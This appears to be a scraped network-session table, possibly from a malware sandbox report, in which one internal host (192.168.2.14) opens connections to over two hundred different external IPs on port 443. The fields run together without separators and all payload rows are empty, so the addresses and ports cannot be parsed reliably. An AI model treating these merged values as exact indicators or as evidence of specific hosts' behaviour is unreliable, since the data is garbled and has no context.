                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18402192.168.2.1456296158.163.48.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18403192.168.2.1448332216.173.160.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18404192.168.2.14481789.57.71.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18405192.168.2.1440800198.198.84.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18406192.168.2.143662623.49.136.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18407192.168.2.1437924122.112.118.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18408192.168.2.143410679.155.9.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18409192.168.2.1450236160.183.151.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18410192.168.2.1445950125.237.127.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18411192.168.2.145478036.233.253.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18412192.168.2.143705276.91.102.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18413192.168.2.144936881.38.141.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18414192.168.2.1438678115.226.26.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18415192.168.2.144016450.157.187.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18416192.168.2.144294695.88.160.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18417192.168.2.1450756116.29.227.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18418192.168.2.14540581.235.245.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18419192.168.2.1432802152.65.161.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18420192.168.2.1441968102.15.14.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18421192.168.2.1454332163.160.238.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18422192.168.2.1458732213.151.161.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18423192.168.2.144082027.20.81.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18424192.168.2.143689249.135.106.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18425192.168.2.1458996131.228.148.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18426192.168.2.1449806200.32.96.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18427192.168.2.1448924109.199.203.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18428192.168.2.1458682207.68.183.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18429192.168.2.143918018.109.64.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18430192.168.2.1446786160.123.202.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18431192.168.2.1437318194.199.246.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18432192.168.2.145123662.251.77.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18433192.168.2.1445742176.254.17.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18434192.168.2.1436910196.92.254.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18435192.168.2.144386042.153.143.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18436192.168.2.1458766221.161.132.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18437192.168.2.143996459.135.167.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18438192.168.2.1442522100.204.239.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18439192.168.2.145195454.181.74.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18440192.168.2.145739440.205.153.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18441192.168.2.1457414188.249.57.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18442192.168.2.144014685.57.209.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18443192.168.2.1445378116.209.206.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18444192.168.2.14477009.161.48.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18445192.168.2.1452552211.104.183.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18446192.168.2.143931657.227.152.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18447192.168.2.1459636165.145.243.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18448192.168.2.1447542160.137.189.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18449192.168.2.143439470.163.102.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18450192.168.2.1458136188.157.100.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18451192.168.2.143475838.84.228.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18452192.168.2.1435216192.244.26.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18453192.168.2.145404075.190.208.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18454192.168.2.1441376192.53.113.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18455192.168.2.144272865.28.167.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18456192.168.2.1455726206.210.83.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18457192.168.2.1437434171.115.226.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18458192.168.2.144341049.107.79.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18459192.168.2.1455822158.19.50.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18460192.168.2.1448166147.36.59.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18461192.168.2.145169477.104.26.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18462192.168.2.1452594198.169.102.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18463192.168.2.145961883.169.200.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18464192.168.2.1454092182.39.245.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18465192.168.2.1449588204.116.53.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18466192.168.2.143958097.23.70.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18467192.168.2.1443406105.36.57.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18468192.168.2.1458698138.56.203.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18469192.168.2.145244266.126.161.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18470192.168.2.144643231.65.126.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18471192.168.2.145087097.205.8.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18472192.168.2.1437260184.80.143.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18473192.168.2.145091882.163.69.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18474192.168.2.14589282.215.132.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18475192.168.2.145545044.186.194.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18476192.168.2.1434402120.72.111.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18477192.168.2.1437786112.232.111.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18478192.168.2.1437536223.209.136.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18479192.168.2.1452730126.124.247.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18480192.168.2.1442636135.199.141.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18481192.168.2.145555862.91.212.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18482192.168.2.1446478158.182.28.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18483192.168.2.1444906136.218.224.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18484192.168.2.1454920125.155.170.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18485192.168.2.1434208223.202.252.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18486192.168.2.144942880.221.150.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18487192.168.2.1438360141.31.133.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18488192.168.2.1434994181.249.52.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18489192.168.2.143890079.71.206.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18490192.168.2.144901018.188.102.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18491192.168.2.1443568208.237.218.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18492192.168.2.144937652.82.52.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18493192.168.2.144872424.125.95.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18494192.168.2.1455732133.16.61.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18495192.168.2.1459776170.12.213.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18496192.168.2.146050065.56.130.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18497192.168.2.1447858203.184.140.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18498192.168.2.144075838.220.85.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18499192.168.2.1456334153.90.65.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18500192.168.2.1434240121.79.8.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18501192.168.2.145854236.188.16.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18502192.168.2.1459382165.153.81.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18503192.168.2.144818614.119.86.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18504192.168.2.143515685.71.88.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18505192.168.2.1443148104.251.18.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18506192.168.2.1435508223.98.72.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18507192.168.2.143896845.65.11.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18508192.168.2.144887871.141.220.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18509192.168.2.1446104112.1.43.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18510192.168.2.1452170147.249.7.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18511192.168.2.143918453.65.48.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18512192.168.2.14526222.168.3.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18513192.168.2.1450880213.197.5.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18514192.168.2.1459292150.221.202.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18515192.168.2.144620088.85.66.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18516192.168.2.143748295.11.242.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18517192.168.2.146088287.216.212.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18518192.168.2.1453626157.228.161.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18519192.168.2.143414881.195.109.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18520192.168.2.1459472119.20.16.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18521192.168.2.1453226113.103.153.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18522192.168.2.144896832.118.102.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18523192.168.2.1434796104.7.150.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18524192.168.2.144051048.30.32.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18525192.168.2.1432982149.229.54.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18526192.168.2.143725485.162.244.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18527192.168.2.145744290.81.25.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18528192.168.2.145336481.220.180.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18529192.168.2.1454772200.45.183.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18530192.168.2.1441328137.106.137.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18531192.168.2.144933477.190.44.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18532192.168.2.1440750212.233.117.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18533192.168.2.1432960119.50.20.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18534192.168.2.1433962223.242.207.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18535192.168.2.1442116171.105.95.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18536192.168.2.1448066108.53.139.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18537192.168.2.1450082132.157.248.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18538192.168.2.144465098.104.11.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18539192.168.2.1444970166.11.197.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18540192.168.2.1456624107.78.217.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18541192.168.2.1443244171.191.165.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18542192.168.2.1451428182.210.9.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18543192.168.2.1459468151.76.13.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18544192.168.2.1440782102.75.195.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18545192.168.2.1459762177.178.186.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18546192.168.2.14344425.117.93.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18547192.168.2.1459376141.195.232.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18548192.168.2.1446752172.186.188.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18549192.168.2.1444650173.65.70.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18550192.168.2.1458848209.148.169.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18551192.168.2.1435256139.242.119.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18552192.168.2.1460198150.97.255.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18553192.168.2.145673081.246.149.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18554192.168.2.145801049.172.225.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18555192.168.2.144914077.137.157.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18556192.168.2.144655038.81.161.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18557192.168.2.1442520220.212.211.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18558192.168.2.1446228116.51.148.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18559192.168.2.1440120163.177.49.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18560192.168.2.144456814.64.121.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18561192.168.2.145294044.37.41.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18562192.168.2.145868061.88.227.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18563192.168.2.144283247.62.124.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18564192.168.2.1439690121.9.216.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18565192.168.2.1458324141.36.40.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18566192.168.2.1438728196.135.183.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18567192.168.2.1435178109.33.129.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18568192.168.2.143481234.38.250.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18569192.168.2.145259690.100.191.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18570192.168.2.143626858.102.127.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18571192.168.2.145553477.138.221.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18572192.168.2.1453520163.225.13.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18573192.168.2.1459384123.185.49.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18574192.168.2.1435620179.133.100.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18575192.168.2.144397449.18.20.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18576192.168.2.145924047.4.23.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18577192.168.2.14445005.138.171.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18578192.168.2.144438061.95.86.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18579192.168.2.143608283.133.183.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18580192.168.2.1444562107.148.67.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18581192.168.2.145096031.179.177.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18582192.168.2.1434122185.23.48.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18583192.168.2.1460842116.166.54.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18584192.168.2.1451024179.217.106.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18585192.168.2.146022877.226.140.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18586192.168.2.143519051.110.51.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18587192.168.2.1433978117.188.205.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18588192.168.2.1433594190.249.212.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18589192.168.2.145259627.191.228.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18590192.168.2.145539861.154.168.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18591192.168.2.1433910176.254.207.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18592192.168.2.1450812173.85.66.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18593192.168.2.1460206193.38.205.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18594192.168.2.1442280182.187.255.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18595192.168.2.1454648103.239.68.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18596192.168.2.1442498136.165.152.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18597192.168.2.1453334161.160.155.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18598192.168.2.143538095.235.87.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18599192.168.2.1436286204.90.196.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18600192.168.2.1448640149.70.202.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18601192.168.2.145375664.234.175.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18602192.168.2.14583702.167.172.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18603192.168.2.144568668.215.43.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18604192.168.2.1444098213.85.184.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18605192.168.2.1448630204.95.77.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18606192.168.2.1438588101.26.24.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18607192.168.2.1457272129.120.108.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18608192.168.2.1440256136.15.217.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18609192.168.2.143876462.117.207.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18610192.168.2.1451438189.74.113.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18611192.168.2.1446144205.37.158.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18612192.168.2.1445040179.65.97.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18613192.168.2.144580684.43.139.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
